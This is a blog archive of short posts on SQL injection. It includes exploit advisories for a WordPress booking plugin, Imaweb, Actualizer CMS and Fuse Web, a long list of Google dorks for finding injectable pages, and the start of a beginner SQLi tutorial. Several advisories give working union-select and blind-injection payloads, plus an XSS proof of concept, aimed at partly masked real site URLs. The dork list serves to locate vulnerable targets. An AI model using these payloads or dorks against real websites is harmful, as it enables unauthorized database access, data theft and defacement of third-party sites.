sqli

WordPress Booking System SQL Injection vulnerable

By |May 27th, 2014|

Exploit Title: WordPress Booking System (Booking Calendar) plugin SQL Injection
Release Date: 2014-05-21
Author: maodun
Contact: Twitter: @conmancm
Software Link: http://wordpress.org/support/plugin/booking-system
Affected version: < 1.3
Google Dork: inurl:/wp-content/plugins/booking-system/
REF: CVE-2014-3210

Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.

SQLi – Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerabile parameter:$_POST[‘booking_form_id’]
POC:
POST […]

Comments Off on WordPress Booking System SQL Injection vulnerable

Imaweb SQL injection Vulnerability

By |December 30th, 2013|

Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by : ACC3SS

Location :
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql
Injection]
Demo:
http://www.avajaXXn.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(
),4,5,6,7–

http://www.auzXay.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version()
,4,5,6,7–

http://www.roumeXgoux.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,versio
n(),4,5,6,7–

http://www.oxygXeneinsertion.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2
,version(),4,5,6,7–

http://www.petXersbach.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,vers
ion(),4,5,6,7–

Comments Off on Imaweb SQL injection Vulnerability

Google Dorks For SQL Injection

By |October 10th, 2013|

1500+ google Dorks for sql injection.
Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.

list below:

allinurl:*.php?txtCodiInfo=
inurl:read.php?=
inurl:”ViewerFrame?Mode=”
inurl:index.php?id=

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=

inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
intitle:axis intitle:”video server”
inurl:indexFrame.shtml Axis
?intitle:index.of? mp3 artist-name-here
“intitle:index of”
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: […]

Comments Off on Google Dorks For SQL Injection

Actualizer CMS – Multiple Vulnerabilities

By |October 10th, 2013|

Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact: [email protected]

1. Blind SQL Injection
host/galeria/galeria-2 /gal,1 ‘%20or%20’1’=’2.html – false
host/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘= ‘ 1. html – true
PoC:
http://site/galeria/galeria-2/gal,1 ‘%20or%20 ‘1’=’ 2. html
2. Cross Site Scripting
host/katalog/nowosci/archiwum/year,”xss
PoC:
site/katalog/nowosci/archiwum/year,”xss
3. Full Path Disclosure
host/newsletter.php
POST: action=save&cat=666%email[][email protected]&imie=devil

host/konto/rejestracja
POST (multipart): login=1

Comments Off on Actualizer CMS – Multiple Vulnerabilities

Basic SQL Injection Tutorial part-1

By |October 8th, 2013|

According to OWASP SQL Injection is the most common technique used by hackers to Deface a website. SQL Injectionis a technique in which the hacker inserts SQL codes into a web Form to get Sensitive information like (User Name , Passwords). I will explain the Various types of SQL Injections.

Things You Should Know
Database: In simple words Database is a collection of data.
Database […]

Comments Off on Basic SQL Injection Tutorial part-1

Fuse Web SQL Injection Vulnerability

By |October 6th, 2013|

Exploit Title: Fuse Web SQL Injection Vulnerability SQL Injection Vulnerability In FuseWeb

Exploit Author: Ashiyane Digital Security Team
Discovered By : ACC3SS
Software Link : http://www.fuse.no
Google Dork: intext:”Powered by Fuse Web”
Tested on: Windows,Linux
Date : 2013/09/14

Location :
127.0.0.1/path/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection]
Proof:
http://www.bjXom/?HovedMenyId=&InnholdMenyId=&Mode=’
http://www.X/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wX/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwX/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=’
http://X.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXning.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://stabbuXkk.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://www.romXXaard.no/?HovedMenyId=&InnholdMenyId=&Mode=’
 
source:cxsecurity

Comments Off on Fuse Web SQL Injection Vulnerability